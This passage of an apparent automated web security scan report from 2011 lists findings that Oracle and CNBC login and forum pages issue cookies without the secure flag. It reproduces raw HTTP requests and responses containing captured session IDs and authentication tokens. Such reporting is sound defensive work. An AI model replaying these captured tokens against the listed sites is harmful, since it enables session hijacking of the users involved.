Cookie: JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; BIGipServerforums_prod_pool=51417741.20480.0000; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84

Response

HTTP/1.1 302 Moved Temporarily
Server: Oracle-Application-Server-10g
Content-Language: en-US
Location: https://forums.oracle.com/forums/adfAuthentication?success_url=/main.jspa?categoryID=84
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 16:14:08 GMT
Connection: keep-alive
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; path=/forums
Content-Length: 339

<HTML><HEAD><TITLE>Redirect to http://forums.oracle.com/forums/adfAuthentication?success_url=/main.jspa?categoryID=84</TITLE></HEAD><BODY><A HREF="http://forums.oracle.com/forums/adfAuthentication?suc
...[SNIP]...

7.6. https://forums.oracle.com/forums/main.jspa

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://forums.oracle.com
Path:   /forums/main.jspa

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

   JSESSIONID

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forums/main.jspa;jsessionid=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0?categoryID=84 HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: http://www.oracle.com/technetwork/index.html?ssSourceSiteId=ocomen
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_nr=1315343589432; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=51417741.20480.0000

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Content-Length: 246459
Date: Tue, 06 Sep 2011 16:13:42 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; path=/forums

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>

<head>


<title>OTN Discussion Forums : Forum Home</title>
<meta http-equiv="content-type" content="
...[SNIP]...

7.7. https://register.cnbc.com/forgotPassword.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://register.cnbc.com
Path:   /forgotPassword.do

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

   JSESSIONID
   pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The JSESSIONID cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forgotPassword.do HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:49 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Set-Cookie: JSESSIONID=3903DB621D7BD6523413306545DD8633; Path=/
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Cache-Control: pre-check=0, post-check=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/
Content-Length: 85618


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
   <title>Reset Password</title>
<link href="/css/member_center_sytles.css" rel="stylesheet" typ
...[SNIP]...

7.8. https://register.cnbc.com/memberCenter.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://register.cnbc.com
Path:   /memberCenter.do

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

   JSESSIONID
   pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The JSESSIONID cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /memberCenter.do HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 06 Sep 2011 15:01:29 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Set-Cookie: JSESSIONID=EB56D589D26668AFFB39D13706936E94; Path=/
Location: https://login.cnbc.com/cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=register
Content-Length: 0
Connection: close
Content-Type: text/plain
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:29 GMT; path=/


7.9. https://register.cnbc.com/registerUser.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://register.cnbc.com
Path:   /registerUser.do

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

   JSESSIONID
   pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The JSESSIONID cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /registerUser.do?iframe=yes&source=register HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://login.cnbc.com/cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D; JSESSIONID=EB56D589D26668AFFB39D13706936E94

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:05:43 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Set-Cookie: JSESSIONID=0B252CD2AC1891E8F5AE500FFDA5AC28; Path=/
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Cache-Control: pre-check=0, post-check=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:43 GMT; path=/
Content-Length: 53350


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Ty
...[SNIP]...

7.10. https://login.cnbc.com/cas/logout

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.cnbc.com
Path:   /cas/logout

Issue detail

The following cookie was issued by the application and does not have the secure flag set (the other Set-Cookie headers in this response carry empty values with an expiry in the past, i.e. they clear cookies rather than issue them):

   CASLOGOUT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cas/logout HTTP/1.1
Host: login.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 06 Sep 2011 15:04:31 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Set-Cookie: CASLOGOUT=1315321471554; Domain=.cnbc.com; Expires=Tue, 06-Sep-2011 23:04:31 GMT; Path=/
Set-Cookie: ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: SUBSCRIBERINFO=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: SUBSCRIBERINFO2=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: SUBSCRIBERINFO3=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: c_ws=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: snas=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: c_ipb_member_id=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: c_ipb_session_id=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: c_ipb_pass_hash=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: c_sna=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: c_enc=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Location: http://www.cnbc.com
Content-Language: en
Content-Length: 0
Connection: close
Content-Type: text/html;charset=ISO-8859-1


7.11. https://login.oracle.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

   BIGipServerloginadc_oracle_com_http

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 16:14:14 GMT
Content-Length: 1214
Content-Type: text/html; charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Draft//EN">
<HTML>
<HEAD>
<TITLE>Error 404--Not Found</TITLE>
<META NAME="GENERATOR" CONTENT="WebLogic Server">
</HEAD>
<BODY bgcolor="white">
<FONT FACE=He
...[SNIP]...

7.12. https://login.oracle.com/mysso/signon.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/signon.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set (see the Set-Cookie headers in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /mysso/signon.jsp HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~40F0BA36~0FE16C859C981BB9E73EC1BCB9520947AE23F3021BDE9E6E23623271A3C2A398FE62ABE37945281257E1D3B824BF88141320CDBA0FF76662E24760C533E30D1DCDABEEFDEB72A48E4C6C9ABEDBAF51A9F1010418767AFB7CACAE1E8A1D5BC67D978240D0CFE377F5A9ADE3F9C63F1468D714D8960345942853A8A315C8DEC76320F764A19C14D049E8440950AC3FCB19E8C4625DF9A3218AC7A9ED349F2636076CCFF871747F137DD74D5C63E78617CA86A85534A4BE22A035A1A5C4CE436DAA199E4D86DF00E9AC3337241384508207C772ECABF9255F75DBC84BE0AD6B9337EBE668883113A8DBFD3E00FEA9314357
Content-Length: 2822
Cache-Control: max-age=0
Origin: https://login.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

site2pstoretoken=v1.4%7E40F0BA36%7E0FE16C859C981BB9E73EC1BCB9520947AE23F3021BDE9E6E23623271A3C2A398FE62ABE37945281257E1D3B824BF88141320CDBA0FF76662E24760C533E30D1DCDABEEFDEB72A48E4C6C9ABEDBAF51A9F1010
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Tue, 06 Sep 2011 16:14:14 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: 0
Set-Cookie: ORA_UCM_VER=; domain=.oracle.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
Set-Cookie: ORA_UCM_SRVC=; domain=.oracle.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-ORACLE-DMS-ECID: 0000J8zXBRM6uHK6EVADUS1EHWFB01t_bQ
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/
Content-Length: 14934


<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<html
...[SNIP]...

7.13. https://login.oracle.com/mysso/sso_loginui/b-bg.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/b-bg.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: BIGipServerloginadc_oracle_com_http (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/b-bg.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11w